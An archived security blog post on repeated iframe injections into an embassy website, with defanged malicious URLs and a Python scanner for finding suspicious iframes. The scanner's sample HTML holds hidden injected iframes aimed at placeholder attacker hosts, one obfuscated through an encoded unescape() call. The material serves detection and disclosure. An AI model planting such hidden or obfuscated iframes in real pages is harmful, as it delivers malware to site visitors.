Archived Blog
Nonstop Web Site Re-Infections
06.24.2009 - 2:45 PM

This isn't the first time the site has been compromised. In March of 2009, we noticed an iframe injection pointing to hxxp://[REMOVED]vv.com/index.php. The domain was also serving virus-infected files in other locations, including hxxp://[REMOVED]vv.com/unic/1.exe, a Trojan [see VirusTotal report].
First Malicious Code Injection:
On June 16, 2009, ThreatSeeker detected an obfuscated iframe injection redirecting users to the URL hxxp://[REMOVED].cn/daily_stats/in.cgi?4. At the time, the link was down. A few days later, the link became live, and pointed to a frame (src="http://[REMOVED]s-totonya1.com/1/index.php") containing multiple iframes. The iframes redirected to more malicious files hosted in China (iframe src="data/exp/0.pdf" and iframe src="data/exp/0.swf"). Although those links are not yet live, similar paths on the domain do currently host malicious files (for example, hxxp://[REMOVED]s-totonya1.com/1/data/exp/0.pdf, which uses Exploit.PDF [see VirusTotal report] and hxxp://[REMOVED]s-totonya1.com/1/data/exp/0.swf, which uses Exploit.SWF [see VirusTotal report]).
Second Malicious Injection:
Soon after the last injection, we found a new iframe in the source code. This one pointed to another iframe (src="hxxp://[REMOVED]j.pl:8080/ts/in.cgi?pepsi78") hosted in Poland and redirecting to a host in France (hxxp://[REMOVED]ac.in:8080/index.php). Neither site currently hosts malicious code, but both may be staging sites. So far, we have seen roughly 70 other sites compromised with the same iframe.
Latest Injection:
Attackers retain control of the site and re-compromise it repeatedly, so visitors can be exposed to malicious code at any time. These attacks are part of a broader trend. We've documented a number of compromised embassy sites in the past, illustrating how malware delivery occurs through Web sites.
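The injections described above share a few traits a site owner can check for in their own pages: an iframe pointing at a host other than the site itself, tiny or hidden dimensions, a non-standard port such as :8080, plugin content (.pdf or .swf) loaded inside an iframe, and an iframe that only appears after a script decodes a percent-encoded string. The following scanner is an added example written for this post, not Websense code or the tooling behind ThreatSeeker; the embedded HTML and the hostnames in it (embassy.example, evil-stats.example, exp-host.example, staging.example) are constructed for the demonstration, and the `unescape('...')` decoding it performs is one common obfuscation pattern assumed here, since the post does not say which encoding the injected iframe used.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse, unquote

# Constructed sample: a site page with one legitimate iframe, two injected
# hidden iframes, and a script that writes a third iframe from a
# percent-encoded string (an assumed obfuscation; hosts are placeholders).
SAMPLE_HTML = """
<html><body>
<h1>Embassy News</h1>
<iframe src="/newsletter/embed.html" width="600" height="400"></iframe>
<iframe src="http://evil-stats.example/daily_stats/in.cgi?4" width="0" height="0" style="visibility:hidden"></iframe>
<iframe src="http://exp-host.example/1/data/exp/0.pdf" width="0" height="0"></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//staging.example%3A8080/ts/in.cgi%3Fpepsi78%22%20width%3D1%20height%3D1%3E%3C/iframe%3E'));</script>
</body></html>
"""

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
UNESCAPE_CALL = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)


class IframeCollector(HTMLParser):
    """Collects every <iframe> with its attributes and keeps raw <script>
    bodies so script-written iframes can be decoded and inspected too."""

    def __init__(self):
        super().__init__()
        self.iframes = []   # one dict of lower-cased attributes per iframe
        self.scripts = []   # raw text of each <script> element
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands script bodies over as raw data, untouched
        if self._in_script:
            self.scripts.append(data)


def _is_hidden(attrs):
    """True when the frame is sized to be invisible or styled hidden."""
    def tiny(value):
        try:
            return float(value.strip().rstrip("px")) <= 1
        except ValueError:
            return False
    return (tiny(attrs.get("width", "")) or tiny(attrs.get("height", ""))
            or bool(HIDDEN_STYLE.search(attrs.get("style", ""))))


def find_suspicious_iframes(html, site_host):
    """Return [{'src': ..., 'reasons': [...]}] for every iframe that shows at
    least one of the traits seen in the injections: external host,
    non-standard port, hidden sizing, plugin content, or script decoding."""
    collector = IframeCollector()
    collector.feed(html)
    candidates = [(attrs, False) for attrs in collector.iframes]

    # Decode unescape('...') payloads inside scripts and look for iframes there
    for script in collector.scripts:
        for _quote, encoded in UNESCAPE_CALL.findall(script):
            inner = IframeCollector()
            inner.feed(unquote(encoded))
            candidates.extend((attrs, True) for attrs in inner.iframes)

    findings = []
    for attrs, from_script in candidates:
        src = attrs.get("src", "")
        parsed = urlparse(src)
        reasons = []
        if parsed.hostname and parsed.hostname != site_host:
            reasons.append("external host")
        if parsed.port not in (None, 80, 443):
            reasons.append(f"non-standard port {parsed.port}")
        if _is_hidden(attrs):
            reasons.append("hidden")
        if parsed.path.lower().endswith((".pdf", ".swf")):
            reasons.append("plugin content loaded in iframe")
        if from_script:
            reasons.append("written from obfuscated script")
        if reasons:
            findings.append({"src": src, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_iframes(SAMPLE_HTML, "embassy.example"):
        print(finding["src"], "->", ", ".join(finding["reasons"]))
```

Run against a saved copy of each page (or a crawl of the whole site) with `site_host` set to the site's own hostname; the legitimate same-origin iframe produces no finding, while each injected one is reported with the reasons that apply. A scheduled run that diffs its output against a known-good baseline is a cheap way to notice a re-infection of the kind described here before visitors do.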
Alert:
Compromised Site: Embassy of Ethiopia in Washington D.C.
Past Embassy Alerts:
Compromised Site: Embassy of Portugal in India
Compromised Sites: The Embassy of the Republic of Azerbaijan in the Republic of Hungary and in Pakistan
Compromised Site: Embassy of Brazil in India Site